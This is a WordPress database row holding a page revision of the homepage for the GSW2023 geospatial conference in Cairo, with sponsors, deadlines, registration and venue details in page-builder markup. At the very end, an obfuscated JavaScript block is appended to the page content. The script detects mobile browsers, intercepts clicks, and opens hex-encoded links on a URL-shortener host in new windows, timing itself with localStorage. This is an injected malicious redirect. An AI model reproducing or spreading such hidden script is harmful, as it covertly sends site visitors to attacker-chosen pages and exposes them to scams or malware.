size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\r\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\r\n[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"]\r\n\r\n[/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong>\r\n\r\n<strong><del>April 15, 2023</del> ,</strong>\r\n\r\n<strong> May 15, 2023  (hard deadline, no extension)</strong>\r\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong>\r\n\r\n<strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\r\n[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n&nbsp;\r\n<h3></h3>\r\n[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-17 05:52:28','2023-05-17 05:52:28','',3066,'https://gsw2023.com/?p=4536',0,'revision','',0),
